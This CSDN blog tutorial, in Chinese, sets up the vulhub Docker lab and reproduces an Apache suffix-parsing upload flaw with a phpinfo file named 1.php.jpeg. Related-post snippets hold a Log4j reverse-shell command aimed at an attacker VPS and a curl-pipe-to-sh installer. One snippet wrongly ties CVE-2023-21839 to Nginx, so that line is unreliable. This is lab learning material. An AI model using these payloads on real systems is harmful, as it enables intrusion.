vulhub靶场搭建及漏洞复现教程

最新推荐文章于 2025-03-23 15:25:51 发布
最新推荐文章于 2025-03-23 15:25:51 发布
阅读量2.2w 收藏 183
点赞数 23
分类专栏: 靶机搭建 文章标签: vulhub 漏洞复现 靶场搭建
本文链接:https://blog.csdn.net/weixin_59679023/article/details/123739030
版权

准备一个纯净的ubantu系统

1、先更新一下安装列表

sudo apt-get update

2、安装docker.io

sudo apt install docker.io

查看是否安装成功

docker -v

3、查看是否安装pip

pip -V

检测到未安装,提示是否安装,按y下载

再次输入pip -V查看是否安装成功

4、安装docker-compose

pip install docker-compose

查看是否安装成功

docker-compose -v

5、下载靶场文件

git clone https://github.com/vulhub/vulhub.git

接下来就针对某个漏洞进行docker启用并复现漏洞

访问:Vulhub - Docker-Compose file for vulnerability environment

比如我们现在要复现Apache HTTPD未知后缀名漏洞,找到进入路径

按照以上路径,从ubantu进入

cd apache_parsing_vulnerability

启动docker(会自动构造漏洞环境)

docker-compose up -d

查看靶机ip

ifconfig

打开物理机浏览器访问该ip,打开靶机环境

查看教程,需要上传一个文件,文件名为xxx.php.jpeg,上传以后,该文件被当成php文件执行,而不是作为jpeg图片

物理机新建一个txt文档,输入<?php phpinfo();?> 保存名为1.php.jpeg

打开刚才漏洞环境,上传该文件

文件上传成功,复制红框内的文件路径,和IP拼接为新的url http://192.168.98.30/uploadfiles/1.php.jpeg

访问 http://192.168.98.30/uploadfiles/1.php.jpeg ,出现如下界面,说明1.php.jpeg文件被执行了,说明该系统存在后缀名解析漏洞

其他漏洞复现都可以访问Vulhub - Docker-Compose file for vulnerability environment,每个漏洞都有详细复现过程,祝大家靶场通关,技术提升。

centos7上docker搭建vulhub靶场
weixin_45653478的博客
04-12 1521
VulHub是一个在线靶场平台,提供了丰富的漏洞环境供安全爱好者学习和实践。该平台主要面向网络安全初学者和进阶者,通过模拟真实的漏洞环境,帮助用户深入了解漏洞的成因、利用方式以及防范措施。此外,VulHub还提供了丰富的教程和文档,方便用户快速上手并深入学习。
Vulhub 靶场搭建使用
weixin_68177269的博客
08-11 4441
Vulhub是一个基于docker和的漏洞环境集合,进入对应目录并执行一条语句即可启动一个全新的漏洞环境,让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身1.下载docker:sudo vim /etc/apt/sources.list #更新源2.下载docker-compose:使用二进制文件进行下载3.下载vulhub:4.打开靶场,启动靶场进入靶场目录下。
5、关于kali搭建vulhub
weixin_51520483的博客
08-09 2600
开启docker服务:systemctl start docker启动容器环境:docker-compose up -d关闭容器环境:docker-compose down -v。
vulhub | vulhub安装教程,有这一篇就够了~(详细图解)
鱼溯的博客
01-31 1万+
vulhub | vulhub安装教程,有这一篇就够了,包含Centos和kali的安装,以及docker与docke-compose的详细命令(详细图解)
vulhub | kali Linux搭建vulhub靶场(超详细)
最新发布
03-23 2145
手把手教你用kali轻松搭建 vulhub 测试环境!
vulhub安装教程(centos7)
sweetie 的博客
04-11 2287
Vulhub是一个基于docker和docker-compose的漏洞环境集合,进入对应目录并执行一条语句即可启动一个全新的漏洞环境,让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身。 一.安装docker curl -sSL https://get.daocloud.io/docker | sh 使用docker命令检测是否安装成功 二.安装git(有则跳过) yum -y install git git clone https://github.com/vulhub/vulhub.g
[ vulhub漏洞复现篇 ] vulhub 漏洞集合(含漏洞复现文章连接)
热门推荐
qq_51577576的博客
09-21 1万+
介绍:Vulhub是一个面向大众的开源漏洞靶场,无需docker知识,简单执行两条命令即可编译、运行一个完整的漏洞靶场镜像。 计划:这里记录了 vulhub 所有的漏洞,本专栏也会将这些漏洞全部复现,欢迎持续订阅 我也会不定期再中间更新复现文章链接 目的:以复现 vulhub 漏洞为路径,展示不同的渗透思路及手法,同类漏洞我会尽量用多种渗透思路进行复现,不仅仅是提高个人能力,也是想再 CSDN 这个平台认识更多的安全爱好者
Kali 搭建Vulhub靶场 (详细)
qq_43508668的博客
04-21 1718
这里写目录标题安装Docker安装pip安装docker-compose下载Vulhub 安装Docker 检查软件更新 apt-get update 安装https协议、CA证书 apt-get install -y apt-transport-https ca-certificates 安装docker apt install docker.io docker -v 查看是否安装成功 启动docker systemctl start docker 显示docker信息 docker ps -
vulhub靶场漏洞复现
m0_60660067的博客
08-11 393
vulhub靶场,简单漏洞复现
Vulhub:Shiro[漏洞复现]
如有错误感谢斧正
12-07 1174
Apache Shiro 1.2.4及以前版本中,加密的用户信息序列化后存储在名为remember-me的Cookie中。在Apache Shiro 1.1.0以前的版本中,shiro 进行权限验证前未对url 做标准化处理,攻击者可以构造`/`、`//`、`/./`、`/../` 等绕过权限验证。在Apache Shiro 1.5.2以前的版本中,在使用Spring动态控制器时,攻击者通过构造`..;服务启动后,访问`http://your-ip:8080`可使用`admin:vulhub`进行登录。
vulhub靶场log4j2漏洞复现
A2893992091的博客
09-08 409
java -jar target/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,[ 经过 base64 编码后的命令 ]}|{base64,-d}|bash" -A [你的 vpsip]开始反弹Shell准备 JNDI-Injection-Exploit 下载地址并构造PayLoad如下...启动!拿取JDK1.8并构造Payload且直接访问..可以看到⽹⻚被重定向到了我们的恶意类⽹址。漏洞编号:CVE-2021-44228。
vulhub靶场】Tomcat中间件漏洞复现
M372109150的博客
05-04 3521
本文主要是对tomcat中间件相关漏洞复现,包括Tomcat AJP 任意文件读取/包含漏洞 (CVE-2020-1938)、Tomcat 任意文件写入漏洞 (CVE-2017-12615)以及Tomcat 弱密码和后端 Getshell 漏洞
vulhub靶场Webmin(CVE-2019-15107)漏洞复现
weixin_45095113的博客
12-12 922
Webmin(CVE-2019-15107)漏洞复现
CentOS 7搭建vulhub靶场教程
weixin_63831720的博客
08-10 642
找到容器镜像服务点击镜像工具下面的镜像加速器里面有我们的加速地址。如果这里出现报错,去我之前的文章看一下解决。下载成功后用查看目录文件命令检查一下。如果这里下载不了去我的文章看一下解决。到浏览器输入IP地址加8080即可。写入下面的代码和镜像加速地址。创建vulhub文件夹。OK,这里就算成功了。
centos7安装docker以及docker-compose并且搭建vulhub和vulfoucs
DamnVanish的博客
11-05 1060
前言;我的centos7只有yum没有apt-get。一开始用yum去下docker的的东西发现下不了不知道怎么就warning了,当时放弃了准备去在kali上面搭建docker的,但是在2021kali上面搭建的vulfocus不知道怎么启动不了我也都给了4g的运行内存了还是动不了,然后我真的不想在我的本机电脑的kali上搭建vulhub真的没空间了啊,所以还是在centos7上面搭建靶场,注意本文所使用的为centos7虚拟机搭建
vulhub漏洞复现
qq_30854761的博客
04-26 4282
下载镜像 1 docker pull medicean/vulapps:s_shiro_1 直接运行镜像,将docker的8080端口映射到本地的 8080上 1 docker run -d -p 8080:8080 medicean/vulapps:s_shiro_1 获取复现需要用到的ysoserial工具 若无mvn则自行下载安装 1 2 3 git clone..
vulhub漏洞复现-Nginx
遇事不决冲冲冲
10-28 5007
Nginx nginx是一个高性能的HTTP和反向代理web服务器。 思路 在关闭了pathinfo的情况下,只有.php后缀的文件才会被发送给fastcgi解析。 而存在CVE-2013-4547的情况下,我们请求1.gif[0x20][0x00].php,这个URI可以匹配上正则\.php$,可以进入这个Location块;但进入后,Nginx却错误地认为请求的文件是1.gif[0x20],就设置其为SCRIPT_FILENAME的值发送给fastcgi,而Fastcgi根据SCRIPT_FILENAM
在Centos7中搭建Vulhub靶场
LCW991207的博客
08-16 584
在Centos7中搭建Vulhub靶场,全网最详细讲解
vulhub靶场cve漏洞复现文件上传
01-04
### Vulhub CVE 漏洞复现中的文件上传实验 #### Apache HTTPD 换行解析漏洞(CVE-2017-15715) 在处理文件上传的过程中,Apache HTTPD 的换行符解析存在缺陷。攻击者可以通过精心构造的HTTP请求来绕过安全机制并执行恶意操作[^1]。 对于该漏洞的具体实现方式,在构建测试环境时需准备如下组件: - 安装 Docker 和 Git 工具; - 使用 `git clone` 命令克隆 vulhub 项目仓库到本地机器上; ```bash git clone https://github.com/vulhub/vulhub.git ``` 接着进入对应的漏洞案例路径下启动容器服务: ```bash cd vulhub/httpd/CVE-2017-15715/ docker-compose up -d ``` 完成上述配置之后即可访问指定端口验证是否存在此问题,并尝试通过POST方法提交含有特殊字符的数据包来进行进一步探索。 #### Nginx 解析漏洞下的文件上传场景(CVE-2023-21839) 针对Nginx服务器存在的特定版本解析错误,可以利用其对PHP脚本不当处理的特点实施攻击行为。当满足一定条件下,能够使远程未经身份验证的用户向Web应用程序发送特制请求从而获取反序列化对象的能力,最终达到命令注入的效果[^2]。 为了重现这一过程,建议按照官方给出的操作指南搭建模拟平台: 同样先拉取最新版源码库至工作区, ```bash git clone https://github.com/vulhub/vulhub.git ``` 定位到目标位置激活所需的服务实例: ```bash cd vulhub/nginx/CVE-2023-21839/ docker-compose up -d ``` 此时应该能看到一个简易的表单页面允许我们上传任意类型的文档。借助于已公开发布的Exploit工具集可快速获得反弹Shell连接权限。
评论 9
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Cwillchris

你的鼓励将让我产出更多优质干货

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值